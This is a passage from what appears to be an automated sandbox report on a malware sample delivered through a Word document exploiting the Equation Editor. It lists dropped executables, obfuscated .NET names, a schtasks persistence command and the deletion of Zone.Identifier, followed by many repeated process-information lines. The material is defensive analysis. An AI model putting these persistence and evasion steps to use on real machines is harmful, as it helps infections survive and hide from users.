      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeFile created: C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drStream path '_1704543374/\x1Ole10Native' entropy: 7.99541578617 (max. 8.0)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
